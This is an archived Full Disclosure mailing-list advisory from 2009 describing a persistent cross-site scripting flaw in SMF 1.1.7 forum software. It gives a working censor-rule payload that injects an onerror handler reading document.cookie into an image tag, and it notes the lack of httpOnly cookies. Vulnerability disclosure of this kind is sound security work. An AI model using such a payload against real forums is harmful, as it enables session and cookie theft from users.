Home page logo

fulldisclosure logo Full Disclosure mailing list archives

SMF 1.1.7 Persistent XSS (requires permision to edit censor)
From: Eduardo Vela <sirdarckcat () gmail com>
Date: Tue, 3 Feb 2009 02:56:37 -0600

SMF 1.1.7 (simplemachines.org) XSS


If you can modify the censor on a SMF forum, then you can make it
execute arbitrary JS code.

Just add the following entry:
http://www.test.xss/ => http://www.test-xss/"; onerror="alert(document.cookie)

And then write a post, modify your signature, or send a PM with the code:

And the HTML code generated will be..
<img src="http://www.test-xss/"; onerror="alert(document.cookie)"
alt="" border="0" />

 - SMF is not using httpOnly cookies.
 - I'm going full disclosure with this because I've had bad
experiences with the SMF team when reporting vulnerabilities..

-- Eduardo

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • SMF 1.1.7 Persistent XSS (requires permision to edit censor) Eduardo Vela (Feb 03)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]